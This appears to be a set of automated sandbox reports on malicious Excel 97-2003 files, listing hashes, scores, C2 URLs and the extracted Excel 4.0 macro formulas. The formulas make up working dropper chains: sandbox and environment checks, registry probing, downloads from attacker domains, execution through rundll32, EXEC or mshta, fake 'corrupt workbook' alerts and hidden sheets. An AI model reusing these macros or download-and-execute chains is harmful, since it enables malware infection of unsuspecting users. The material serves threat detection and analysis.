{"version":"0.2","sample":{"sample":"","kind":"file","target":"969a9cd250f7f915a5ac1081a716c15c223b22ac82543cc9577e89e8e4f5e97b"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"969a9cd250f7f915a5ac1081a716c15c223b22ac82543cc9577e89e8e4f5e97b","filesize":193024,"md5":"1981e4ac0ae2a461704d29e96815a64e","sha1":"04b78f64596a2622f2b8a3073280840aba80d731","sha256":"969a9cd250f7f915a5ac1081a716c15c223b22ac82543cc9577e89e8e4f5e97b","sha512":"1085d05ac6d2b30fedf0e540bbccd2a8fa334c86dd5cd2a8d89dcb1c8bd204e8399297d988e20f2af88834ab7257120468a09a68f7b66b084b54e8297aecf50d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"969a9cd250f7f915a5ac1081a716c15c223b22ac82543cc9577e89e8e4f5e97b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/2W6Dpp4b\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"96a44ab0f708a6fbaba7d90aa41fe11526106572cbd6a9bb9cef9b20ea2fe1f3"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"96a44ab0f708a6fbaba7d90aa41fe11526106572cbd6a9bb9cef9b20ea2fe1f3","filesize":219136,"md5":"df8fce806ba7245e41474d05e206d67a","sha1":"c7a247dafbe0b8b6b9ed360c4c796d0b05a96a3d","sha256":"96a44ab0f708a6fbaba7d90aa41fe11526106572cbd6a9bb9cef9b20ea2fe1f3","sha512":"d8e3a854b48a740f74c8e6856148ede927affa607f63e08fd846561fbe888d638a1f3f27bfeb938bf011fe7aabc8b80961486da0ed77ad905f0fec62cefb5711","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"96a44ab0f708a6fbaba7d90aa41fe11526106572cbd6a9bb9cef9b20ea2fe1f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JezBUTXCG0\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9712be37c2d0080f62d62161a71dfbf81f67316f92621cdbedead63567311293"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"9712be37c2d0080f62d62161a71dfbf81f67316f92621cdbedead63567311293","filesize":132608,"md5":"5b872b086b95742df6df4b0be6753369","sha1":"26b01aada49ed2aa1117f500989897dfc244ab54","sha256":"9712be37c2d0080f62d62161a71dfbf81f67316f92621cdbedead63567311293","sha512":"45aa113a65d70a3cf808c1796694210a1878974d50175d9701d92b2d54c768b7ea9840974da8a1fa3d0a71fe1d1ca3a97a3fcb795c1be5bb2c14d35e775efb78","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9712be37c2d0080f62d62161a71dfbf81f67316f92621cdbedead63567311293.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OLqUk4MIJS\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"972854941944393f374d820c1e8e1202863da2b1d50e11e4f5613910d2710c59"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"972854941944393f374d820c1e8e1202863da2b1d50e11e4f5613910d2710c59","filesize":185344,"md5":"6576a9b0c8ca74f9f0addfbd5212fbff","sha1":"7bdc96c000d65e2d20b8cea1d5dd570e2951c527","sha256":"972854941944393f374d820c1e8e1202863da2b1d50e11e4f5613910d2710c59","sha512":"f1995b3c5f17ceb4764226c5b5bda7b3f2f8d270799901220e5a812a0a95dedb2b867490a11b415926f691a42d60b219c8bcb4ba2f5d2901267f5f9a3ccf07be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"972854941944393f374d820c1e8e1202863da2b1d50e11e4f5613910d2710c59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9729a098cb72f626a9b85dddd64d0cc085ad79d8eb12528e90c13915aaacade1"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"9729a098cb72f626a9b85dddd64d0cc085ad79d8eb12528e90c13915aaacade1","filesize":225280,"md5":"c87ba018feae78a921f0796598f1f09b","sha1":"0b792c996d2efe9a478eb09cc83cb0109eb9ca91","sha256":"9729a098cb72f626a9b85dddd64d0cc085ad79d8eb12528e90c13915aaacade1","sha512":"bafb5a81d34934b9a299c91f8ec15c0c267a6b93ca3aa70654d173b18049b35b0617fc024902cd2039bc5c1e2b5ae0d9f1055aeab271ad3bb2d73f07008a14d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9729a098cb72f626a9b85dddd64d0cc085ad79d8eb12528e90c13915aaacade1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8LmiXhFKdY\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee","filesize":537088,"md5":"d253d65adf4285fa5004cd96e647a11f","sha1":"1983b60d923b01fcb14ba813532b2f41f2d6c2fe","sha256":"972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee","sha512":"400181264872f7d26802777d14ac313d178ffe18f86c6ee30b34284291ab39748b05794a7bc808a75d41e3fb9f39aa1e83be4853cf716c88a71332245eda4ef6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"972b598d709b66b35900dc21c5225e5f0d474f241fefa890b381089afd7d44ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(6.3011167402e+10,R$18C$5)\nSUM(R$13C$5,R$19C$5)\nSUM(1.45026085504e+11,2.651149596e+09)\nSUM(R$13C$16,R$19C$16)\nSUM(3.04940132365e+11,3.319591462e+09)\nSUM(R$13C$17,R$19C$17)\nSUM(2.42590700977e+11,4.391535267e+09)\nSUM(R$13C$18,R$19C$18)\nSUM(4.20157812998e+11,3.78211254456e+11)\nSUM(R$13C$19,R$19C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97311914d9fc81b6da05269b72d5c96955d3edcf9b177b4df97b9a705befa549"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"97311914d9fc81b6da05269b72d5c96955d3edcf9b177b4df97b9a705befa549","filesize":185344,"md5":"6aaea25a6bd1815ec9f8a359771b9e85","sha1":"ff9d1e7310ed29333f54bd09ae9039a51be29984","sha256":"97311914d9fc81b6da05269b72d5c96955d3edcf9b177b4df97b9a705befa549","sha512":"477e5b8aec2c0ee403c425e7d1293ec4bc4ec44afcdfafe0f4fdffc1584e01fa3bf196c46abc3e6752905321f218cb2d4c8218a4ea737b9e872c7fb269b587fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97311914d9fc81b6da05269b72d5c96955d3edcf9b177b4df97b9a705befa549.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9748f0f8d1f69dc854b1aa8390dd3500b88665bf42201a0997818c1ee81cc406"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"9748f0f8d1f69dc854b1aa8390dd3500b88665bf42201a0997818c1ee81cc406","filesize":185344,"md5":"22fd35a3325fa9ee6cb25ba8b6ce9770","sha1":"b783831544e816280241eb56f4d95d3164274ceb","sha256":"9748f0f8d1f69dc854b1aa8390dd3500b88665bf42201a0997818c1ee81cc406","sha512":"5808c778158ea99382c271e41a9d6cf763bca17ecf8a1b176ea09e570ee259a5421cef3ebb6cd16e037f1653535feea6d315dce349ac5c8ca21b67792179d19a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9748f0f8d1f69dc854b1aa8390dd3500b88665bf42201a0997818c1ee81cc406.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9759fe54fdce7439c0e895d599aa4559c2899d2e348f4288cf9ea5340a1a3927"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"9759fe54fdce7439c0e895d599aa4559c2899d2e348f4288cf9ea5340a1a3927","filesize":113664,"md5":"d91a29ceadd336e29019e5c60f61cf3c","sha1":"da5916bba2dc34fa4dbe0a87dc676d0d2c18f98e","sha256":"9759fe54fdce7439c0e895d599aa4559c2899d2e348f4288cf9ea5340a1a3927","sha512":"c03fa0f2e8af8deb345c585b6f179fb9be787cc37af61bed86b12add9622c9b9854befdb25d3374c0b09f2356b394a96dce03ddecc6399052f162c8bcd45b5b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9759fe54fdce7439c0e895d599aa4559c2899d2e348f4288cf9ea5340a1a3927.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"PeG2sk9DIm\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9768af3051e33a4f06c04f07f9dc2e8ff3c39af95fe30c86175366f52af4151d"},"analysis":{"reported":"2020-04-09T16:17:50Z","score":10},"files":[{"filename":"9768af3051e33a4f06c04f07f9dc2e8ff3c39af95fe30c86175366f52af4151d","filesize":214016,"md5":"f80acd8b99a42bef002dcf85014ed51f","sha1":"fef4c7dc25594f13ff9258a6d7632f44208392c7","sha256":"9768af3051e33a4f06c04f07f9dc2e8ff3c39af95fe30c86175366f52af4151d","sha512":"74136cddbd24cb465e040d240e65845de1dade18ce0b1c25f9bd1425da8047f44d639ddef3e82a5c48c2a0cca273890c2b008dac0553fab47205549e9f02d913","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9768af3051e33a4f06c04f07f9dc2e8ff3c39af95fe30c86175366f52af4151d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AzzOAU2ogH\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"976af8f281e00d4d4b00b17a2c50cbd6aa68daa7eed97a5b96375af5acdfe448"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"976af8f281e00d4d4b00b17a2c50cbd6aa68daa7eed97a5b96375af5acdfe448","filesize":112128,"md5":"f95ea106b633caafe7edcc08f57dff83","sha1":"61c987be056d679a56f061ca2da1fb469668e64a","sha256":"976af8f281e00d4d4b00b17a2c50cbd6aa68daa7eed97a5b96375af5acdfe448","sha512":"4ea9e0b3b1f91d56a066a4ee5d018ebb983f89fe273baec7870144153b1a90bdb33b8875188bf5508b80f74978306534b702572d5cf101d8fb56afd94fabf7c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"976af8f281e00d4d4b00b17a2c50cbd6aa68daa7eed97a5b96375af5acdfe448.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"976d06cdaf7e2b27baa647e08342efd3c3829b03299ae2c2a303d1b32ef49dd2"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"976d06cdaf7e2b27baa647e08342efd3c3829b03299ae2c2a303d1b32ef49dd2","filesize":219136,"md5":"e4e610974c03081f767174c4acbd3d16","sha1":"2c7e6c53fc3a349c99c8017172dfed3a02095e06","sha256":"976d06cdaf7e2b27baa647e08342efd3c3829b03299ae2c2a303d1b32ef49dd2","sha512":"aaf882c660063bddde5432c149c98462f03c8169063c478a3b177cefd10f62a3948aef9b3ddf87ff81744224908bcbefc063ef79dc8cb04800b7d3394fc59943","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"976d06cdaf7e2b27baa647e08342efd3c3829b03299ae2c2a303d1b32ef49dd2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"n1nRziGhLg\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"977847f602d883389e7fe6f4758ca6332935ea09f2e583e9928792534c5e928b"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"977847f602d883389e7fe6f4758ca6332935ea09f2e583e9928792534c5e928b","filesize":167936,"md5":"fdb2fe813217053b19f6996050febbbd","sha1":"bdc8e991545e090bb0995b4df2cb9832678a6390","sha256":"977847f602d883389e7fe6f4758ca6332935ea09f2e583e9928792534c5e928b","sha512":"99fae077dcc0be2a79ed2bf0cd8af45e6c6716389954911139c2d4ae00e1909029c8a65458de707859b05205069025d21ab653b0aef3020a24ec505306856b7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"977847f602d883389e7fe6f4758ca6332935ea09f2e583e9928792534c5e928b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cQwU5nNSEe\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9795b96b3c89aeea78d36b0ac9da5c740c01d68cdf4218dc9a2acd823b74c8b8"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"9795b96b3c89aeea78d36b0ac9da5c740c01d68cdf4218dc9a2acd823b74c8b8","filesize":185344,"md5":"7725247f655be8acedd0979dc24a4437","sha1":"d90dd79c8c9cf0216f35389450c8bd5e3f342a38","sha256":"9795b96b3c89aeea78d36b0ac9da5c740c01d68cdf4218dc9a2acd823b74c8b8","sha512":"17b91a49eb7ba914c450280cad64dca8c600615c512e2d0bcc83309437025afe72d654259075eb84bec1e89d38245b7a7bf7ee289310981dad11e095959c291b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9795b96b3c89aeea78d36b0ac9da5c740c01d68cdf4218dc9a2acd823b74c8b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"979f0e2bf8fb412ade1724a4364cb2f80cd68a2fdad02db8317fe4613b800d9c"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"979f0e2bf8fb412ade1724a4364cb2f80cd68a2fdad02db8317fe4613b800d9c","filesize":168960,"md5":"913015cf5dd1b03a51bd32ad18636864","sha1":"2a2940096d4b309ef69a9939a2575b3880570d8e","sha256":"979f0e2bf8fb412ade1724a4364cb2f80cd68a2fdad02db8317fe4613b800d9c","sha512":"9c9f49eb3ac401f2ee00786da3004ddf1535b5ec48072dfdd9d520c9c5e869cf2dbb7c97b0ce49399f5a8fea25cc2e29227b4cf8b152ac0632d18e77b1f8a7bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"979f0e2bf8fb412ade1724a4364cb2f80cd68a2fdad02db8317fe4613b800d9c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uUhhQxyXCJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
